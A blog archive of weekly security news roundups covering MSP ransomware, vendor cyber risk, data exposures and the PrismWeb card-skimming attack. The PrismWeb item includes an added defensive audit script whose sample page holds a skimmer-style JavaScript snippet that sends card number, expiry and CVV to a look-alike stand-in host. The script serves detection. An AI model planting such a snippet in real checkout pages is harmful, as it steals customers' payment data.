Tag Archives: VCRM

Security News Bites for the Week Ending July 31, 2020

Many Cyberspace Solarium Commission Recommendations Likely to Become Law

The Cyberspace Solarium Commission was a blue ribbon commission that made recommendations to Congress earlier this year on improving government cybersecurity. It appears that many of their recommendations are being added to the National Defense Authorization Act, which is a “must pass” bill that funds the military. President Trump has said that he will veto it because it directs the Pentagon to rename bases named after Confederate generals. Stay tuned; that sausage is still being made. If the recommendations do remain in the bill, that would be a great thing. Credit: CSO Online

Fintech “Dave” Exposed 7.5 Million Customers’ Data

Fintechs, those Internet firms that act as an intermediary between you and your financial institutions, are not regulated in the same way that, say, banks are. Fintech Dave (yes, that is their name) exposed data on 7.5 million customers as a result of a breach at one of their vendors. One more time, vendor cyber risk management is an issue, and it is Dave, not the vendor, that will wind up with the lawsuits and fines. While credit card data was not exposed, passwords, which were very weakly encrypted, were compromised. Credit: Dark Reading

IRS “Recommends” 2FA – Makes it Mandatory Next Year

The IRS is “recommending” that tax pros use multi-factor authentication, especially when working from home. They say that most of the data thefts reported to the IRS this year by tax pros could have been avoided if the pros had used multi-factor authentication. Starting in 2021, this will be mandatory for all providers of tax software. The IRS seems to recommend authenticator apps like Google Authenticator over SMS codes, which are easier to intercept. Credit: Bleeping Computer

5G is Here – Sort Of

The article says “After years of hype, 5G making progress in the US”. While true, there is less to the statement than most people would like. Last week AT&T joined T-Mobile in claiming that they have deployed 5G nationwide. While this is a true statement, they are doing it using the low frequency band. They are doing this because they can cover the country with an order of magnitude fewer cell sites. Unfortunately, this also means that the speed you will see after you fork over a thousand bucks for a new 5G phone is basically the same as the speed you get today with your current phone, without spending the money on a new phone and a new plan. For details, read the article in USA Today.

Is This Becoming a Thing-Another MSP Ransomed

A couple of weeks ago it was a Managed Service Provider in Denver. A few weeks before that, it was one in Wisconsin. This week it is Irvine, CA based Synoptek, with more than 1,100 customers including state and local governments, financial services and healthcare. Their web site says that they did more than $100 million in business last year.

Someone captured a Tweet of theirs before they deleted it:

Now that they have been hit by a ransomware attack which encrypted customer data on Christmas Eve, they probably wish they had taken their own advice.

They are being very quiet about the whole thing, but reports say that it infected a subset of their customers and that they paid the ransom.  Hopefully they have insurance to cover the cost.

Unlike the attack in Colorado, it looks like these guys were better prepared: they were able to contain the attack and are working quickly to mitigate it.

Several thoughts here:

  • It looks like this *IS* becoming a thing, because for an MSP, if they don’t pay the ransom, if they don’t decrypt their clients’ data, if they don’t minimize the consequences, they are likely out of business. From an attacker’s standpoint, this is THE BEST scenario.
  • Since there are likely tens of thousands of these service providers out there, from mom & pop shops to a few hundred employees (Synoptek has about 700 people), there is no shortage of opportunities.
  • As an MSP’s customer, you want to ask those embarrassing questions, like: do you have insurance, are you prepared, and how long would I be down?
  • This attack also went after the remote management software that MSPs use to administer their customers’ systems, which is a weak spot for MSPs: whoever controls that tool controls every customer endpoint it manages. There are some options when it comes to this, so you might want to ask questions.
  • When it comes to *YOU*, you need to make sure you are prepared:
    • Do you have your own backups, kept somewhere the MSP’s credentials cannot reach?
    • Do you have a monitoring and alerting system to detect the problem quickly (we have a cost effective solution)?
    • What is your plan if one or more of your service providers is down for a day? For a week? For a couple of weeks? Goes out of business?
    • Can you continue to do business while you are down?
  • While the total number of businesses impacted by just these three attacks that hit the news is, best guess, around one thousand companies, that is just 3 attacks. This will likely get uglier before it gets better.

And just to lighten things up a bit, check out this YouTube clip from the animated movie Hoodwinked.  He has a good suggestion – https://www.youtube.com/watch?v=HUIP208nZZs

Source: Brian Krebs

Security News for the Week Ending July 5, 2019

This is What Spies Do

It has come out that Western spies (read: one or more of the Five Eyes countries) inserted malware into Yandex (Russia’s equivalent of Google) in order to steal administrative credentials. The purpose was, apparently, to read emails of interest to the Western spies. We need to understand that we do it to them and they do it to us, but the idea is to make it hard for them and easy for us. Source: Reuters.

Firms That Claim to be Able to Reverse Ransomware Sometimes Lie

Another so-called “data recovery” firm that claims to be able to recover from ransomware turns out to just pay the ransom and mark up the cost. The most recent firm to be outed is Red Mosquito Data Recovery, caught when it was the target of a sting: the researcher played the role of both the victim and the ransomer and discovered what Red Mosquito was doing. Remember that if you do pay the ransom, you still need to rebuild your systems from the ground up, because you do not know what time bombs or back doors the ransomer left behind. Source: ProPublica.

Trump Changes His Mind – Huawei Not a National Security Threat?

After Tweeting for months that Huawei is a national security threat, that their equipment needs to be banned in the US and abroad and that existing equipment needs to be removed, the President now says it is okay if we sell Huawei parts. This happened the day after he met with Xi at the G20, and it is reported that Xi told him the trade war would continue until the ban was removed. While the ban is not removed, it now has a hole wide enough to drive a tractor trailer through. Source: The Register.

One Terabyte of Police Bodycam Video Available on the Dark Web

In another example of companies not requiring vendors to have adequate cybersecurity programs in place, researchers found a terabyte (that is 1,000,000,000,000 bytes) of police bodycam video from Miami and other cities available on the dark web. It is likely this video has been copied and sold. Miami PD is not talking. Probably a good time for the police to plead the Fifth. The problem is linked back to 5 IT vendors who did not protect the data. Either the police departments did not care (worst case) or did not do proper due diligence (best case). I hope they have a bunch of insurance because you know that there will be lawsuits. At some point people will figure out that even though vendor cyber due diligence is hard, getting sued and defending yourself is even harder. Source: The Register.

If China Can’t Buy Memory Chips From the US, it will Get into the Memory Biz and Compete Against Us

In the “trade wars are hard” department, the Chinese just convinced the godfather of Japan’s DRAM business to come to China and head up a company that plans to build its own memory chips. This is likely a result of the current trade war.

If successful, the result will be that western memory chip makers will lose all of their sales to China, but more importantly, China might flood the market with cheap memory chips, damaging the worldwide multi-billion dollar memory business.  Source: The Register.

Microsoft to Require CSPs to Use Multi-Factor Auth

In light of the recent leak of details on Cloud Hopper, Microsoft is becoming very visible and is requiring their Office 365 resellers (Cloud Solution Providers, or CSPs) to use multi-factor authentication in order to reduce the risk that they represent to the ecosystem. This is likely a proactive effort on their part, as they have not been publicly named as a Cloud Hopper victim, but they certainly are a target. Source: Brian Krebs.

 

Presidential Alerts Spoofable

Okay, no jokes about our current President’s love of twitter.

Researchers at the University of Colorado (CU) have demonstrated how easy it is to spoof Presidential alerts, assuming you even get them (you may remember they tested the system last year and lots of people, including me, didn’t get the test).

In this case, the CU researchers say that 4 low power base stations could target every person in a football stadium of, say, 50,000, causing mass panic. While it might be hard to get these briefcase size devices inside a football stadium, it would be pretty easy to get one into soft targets like office buildings or shopping centers, and depending on the message (e.g., “Inbound nukes from China; will detonate here in 10 minutes”), it could cause mass panic. Source: BBC

Supply Chain Attacks Are Going Strong

This time the attack is against an eCommerce platform, PrismWeb, that is used by college bookstores.

The attack is similar to other attacks, in that the hackers somehow got into the company’s systems and inserted a tiny bit of JavaScript that steals credit card data, very similar to Magecart, which is affecting sites from Ticketmaster to British Airways. PrismWeb is integrated into the various college bookstore websites, and when a student goes to checkout, the malware is downloaded from PrismWeb as part of the JavaScript needed to operate the checkout process.

These attackers are clever in that the script takes the data, formats it as JSON, encrypts it and uploads it in a way that makes it look like Google Analytics traffic.

The data being stolen is credit card number, expiration date, CVV, billing name and address, and phone.

Over 200 college bookstores have been affected, translating to tens of thousands of students – or more.

What is important to understand here is the concept, not the fact that 200+ colleges have been impacted.

If you use a service and that service has access to your data (remember card data is only one class of data these guys might want – trade secrets and medical data are two others, for example), you are potentially at risk if you don’t protect yourself.

One thing that all of these attacks have in common is that the data is being uploaded from your site to the attackers. If your site should not be uploading data unsolicited (that is, not in direct response to a user’s request), you need to know when it is happening and get an alert. In practice that means knowing every host your checkout page is allowed to load scripts from and send data to, and treating anything else as an incident.

Of course, attackers can change their MO, but so far, of the thousands of sites affected, this is a common theme.
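One way to put that into practice, as an added example that is not from the original post, from PrismWeb or from any bookstore: a small Node.js audit script that takes a captured copy of the checkout page, pulls out every external script source and every URL literal inside inline scripts, and flags any host that is not on your allowlist, calling out hosts that merely resemble an allowed analytics domain. The HTML, the allowlist and every .test domain name are constructed for illustration and refer to no real system.

```javascript
'use strict';
// Added example, not from the original post or from PrismWeb: audit a
// checkout page for script sources and upload endpoints that are not on
// an allowlist. The HTML, the allowlist and every ".test" domain below are
// constructed for illustration and do not refer to real systems.

// Hosts the checkout page is expected to load code from and send data to.
const ALLOWED_HOSTS = new Set([
  'bookstore.example.test',     // the store's own origin (constructed)
  'www.google-analytics.com',   // the real analytics endpoint it uses
]);

// Constructed sample page: two legitimate scripts plus an inline snippet
// shaped like a skimmer that ships form fields to a look-alike host.
const SAMPLE_CHECKOUT_HTML = `
<html><head>
<script src="https://bookstore.example.test/js/checkout.js"></script>
<script src="https://www.google-analytics.com/analytics.js"></script>
<script>
  var f = document.forms[0];
  var d = JSON.stringify({ n: f.number.value, e: f.exp.value, c: f.cvv.value });
  var x = new XMLHttpRequest();
  x.open('POST', 'https://stats.google-analytics-cdn.test/collect');
  x.send(d);
</script>
</head><body><form>...</form></body></html>`;

// Host of an absolute URL, or null for relative URLs (first-party, not flagged).
function hostOf(url) {
  try {
    return new URL(url).host.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Collect external <script src> targets and URL literals inside inline
// scripts. Regexes are fine for auditing a captured page; a production
// tool should use a real HTML parser.
function extractEndpoints(html) {
  const found = [];
  const srcRe = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
  const inlineRe = /<script\b(?![^>]*\bsrc\s*=)[^>]*>([\s\S]*?)<\/script>/gi;
  const urlRe = /https?:\/\/[^\s"'`<>()]+/g;
  let m;
  while ((m = srcRe.exec(html)) !== null) {
    found.push({ kind: 'script-src', url: m[1] });
  }
  while ((m = inlineRe.exec(html)) !== null) {
    for (const u of m[1].match(urlRe) || []) {
      found.push({ kind: 'inline-url', url: u });
    }
  }
  return found;
}

// Returns the allowed host that `host` imitates (shares its distinctive
// label, e.g. "google-analytics") without being that host, or null.
function looksLikeAllowed(host, allowed) {
  for (const a of allowed) {
    const label = a.split('.').slice(-2, -1)[0];
    if (label && host !== a && host.includes(label)) return a;
  }
  return null;
}

// Every endpoint whose host is absolute and not allowlisted is a finding.
function audit(html, allowed = ALLOWED_HOSTS) {
  const findings = [];
  for (const ep of extractEndpoints(html)) {
    const host = hostOf(ep.url);
    if (host === null || allowed.has(host)) continue;
    const mimic = looksLikeAllowed(host, allowed);
    findings.push({
      kind: ep.kind,
      host,
      url: ep.url,
      note: mimic ? `not allowlisted; resembles ${mimic}` : 'not allowlisted',
    });
  }
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(audit(SAMPLE_CHECKOUT_HTML), null, 2));
}
```

Run it on a schedule against the page as a customer’s browser would receive it (the vendor’s hosted copy, not your source tree) and diff the findings between runs, since a skimmer that arrives bundled inside a script you already trust will show up as a new URL literal rather than a new script tag. The matching browser-side control is a Content-Security-Policy whose connect-src and script-src name only the allowlisted hosts, with a report-uri so that a blocked upload attempt generates an alert instead of silently failing.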

Ultimately, the problem is with the vendor.  Somehow they were compromised.  And the compromise was not detected.

In this case the customers – the 200+ college bookstores – are left to clean up the mess from the vendor.

MAYBE they will be compensated.  Maybe they will have to sue their vendor (that is no fun and will not get them any money for years, even if they win).  That is all a function of how well their Vendor Cyber Risk Management process works.

Ultimately, it is your problem to deal with and right now, most companies are not paying enough attention to it and the hackers are having a field day.  That is, until they are hacked.  At which point they throw millions at it.  Not a great strategy  – for YOU or for YOUR CUSTOMERS.

Source:  Bleeping Computer.

 

Vendor Risk Management Common Misconceptions

If yesterday’s post (on Asus) and many of my posts in the past are any indication, supply chain risk is a huge problem and not very well handled at many companies. Part of the reason why is all of the misconceptions we have. Here are a few, and why they are misconceptions:

The vendor is a large company; surely they have a great security program.

Equifax was a vendor to thousands of companies.  No problem here.

Marriott was a vendor to millions of customers.  Any problems?

The Office of Personnel Management (OPM) held records on more than 20 million people.

You get the idea.

We haven’t given the vendor any Non-public Personal Information (NPI) so there is not much risk.

More states are shifting the standard of care to personally identifiable information (PII).  That is a much bigger footprint.  If the vendor has your customer’s PII and the vendor has a breach, guess who is on the hook legally?  Answer: you.  Because you picked the vendor.

The vendor is privately held, so we can’t get any information on them.

Even if the vendor is privately held you can ask for information.    You can ask for an accountant’s statement.  You can ask about their cybersecurity program.  You can ask for a lot of information.  Do so.

We don’t give our vendor data in electronic format, so there is not much risk.

While paper is lower risk, it is not no risk.  Your shredding service only gets paper.  Likewise your document storage vendor.  Consider each situation carefully.

The vendor’s security is probably good because they are well known.

Target is well known.

Home Depot is well known.

Marriott is well known.

And hundreds of others.  Any questions?

Our vendor was hacked, but they say that they fixed the problem.

Maybe, but maybe not. It depends. Did they put a band-aid on the problem, or did they fix the systemic issues underlying it? Ask questions. This will likely take a bit of digging, but do it anyway.

This vendor has a breakthrough product; surely their security is good too.

Again maybe, but maybe not.  Sometimes breakthrough features are deemed to be more important than security and privacy.  Don’t assume.

The vendor won’t give us what we ask for so we are out of luck.

Maybe.  How important is what you are asking for?  Should you consider a different vendor?  Will they let you look at it but not keep it  (maybe in person or maybe over a web conference)?  Is there alternative information that would work?  They do likely want your business, so engage them to help you figure it out.

The vendor’s security program looks strong, so their third parties (our fourth parties) are strong too, right?

Maybe, but that is a bit of a stretch.  Review their vendor cyber risk management program first before you make that assumption, especially if the fourth party has your sensitive data.

I would never fall for a phishing attack so I am sure that our vendor wouldn’t either.  We don’t need no stinkin’ training and neither do they.

That is so wrong on so many levels. We have many stories of businesses that “didn’t need training” that fell for phishing scams, lost sensitive data or even lost hundreds of thousands of dollars. While training doesn’t fix everything, it is important. Don’t skip the training, and remember that training is not a one time event.

These are just a few of the misconceptions, there are many more.

If your vendor has a breach, you are on the hook.  Maybe they are too, but you are first and foremost.  Your customers look to you to protect their data.

If you need help with your vendor cyber risk management program, contact us.

Security News Bites for the Week Ending January 25, 2019

Oklahoma Government Data Left Unprotected

The Oklahoma Department of Securities left data going back to at least 1999 unprotected online.  Data exposed included state agency passwords and login information, data on FBI investigations, information on thousands of securities brokers and other information.  The state says it was unprotected for “a limited duration”.  They are investigating.  Source: The Hacker News.

 

NOYB Files More GDPR Complaints

None of Your Business, the non-profit founded by the Austrian privacy activist and lawyer who has long been a thorn in Facebook’s side, has filed 10 complaints with the Austrian Data Protection Authority.

They say that companies are not fully complying with the requirements of GDPR in providing data to requestors and some companies didn’t even bother to reply at all.  For the most part, they said that companies did not tell people who they shared data with, the source of the data or how long they stored it for.

Beware, this is only the beginning of challenges for companies that have built their business models on selling your data.  The press release also shows the MAXIMUM potential fine (not likely), which ranges from 20 million to 6.3 billion Euros.  Source: NOYB .

 

Another Zero Click WiFi Firmware Bug

Security researcher Denis Selianin has released the code for a WiFi firmware bug he presented a paper on last year. The exploit targets the ThreadX real-time OS firmware running on Marvell Avastar WiFi chips and allows an attacker to take over a system even if the device is not connected to a WiFi network. Affected devices include the Sony PlayStation 4, Microsoft Surface, Xbox One, Samsung Chromebook, Galaxy J1 and other devices. All it takes is for the device to be powered on and within radio range.

I am not aware of a patch for the firmware of WiFi devices to fix this and likely, for most WiFi devices, the risk will remain active until the device winds up in a landfill or recycling center, even if a patch is released.  Source:  Helpnet Security.

 

Apple Releases Patches For iPhone, Mac and Wearables

Apple has released patches for the iPhone (and other i-devices) that include several remote code execution bugs (vulnerabilities that can be exploited remotely), including FaceTime, Bluetooth and 8 bugs in the WebKit browser engine. The iOS kernel had 6 vulnerabilities patched that allowed an attacker to elevate his or her privilege level.

macOS got similar patches, since much of the same software runs on the Mac, but there were Mac-specific bugs as well.

Rounding out the patch set were patches for the Apple watch and Apple TV.

At one time Apple software was simpler and therefore less buggy, but over time it has gotten more complex and therefore more vulnerable.  Source: The Register.

Data Analytics Firm Ascension Reveals 24 Million Mortgage Related Documents

Ascension, a data analytics firm, left a stash of 24 million mortgage related documents exposed. It is not clear who owns the data, which belongs to tens of thousands of loans, but it appears that the originators of the loans include Citi, Wells, Capital One and HUD. Ascension’s parent company, Rocktop, owns a portfolio of 46,000 loans, but we don’t know if these are theirs.

While they think the loan documents were only exposed for a few weeks, that is certainly enough time for a bad guy to find them.  After all, a researcher found them. Now Ascension is having to notify all of the affected parties and I am sure that the lawsuits will begin shortly.

If this isn’t a poster child for making sure that your VENDOR CYBER RISK MANAGEMENT PROGRAM is in order, I don’t know what to say.

This could be a third party cyber risk problem *OR* it could be a fourth party cyber risk problem.  In either case, if your vendor cyber risk management house is not in order, it will likely be YOUR problem.  Now would be a good time to review your program.  Source:  Housingwire.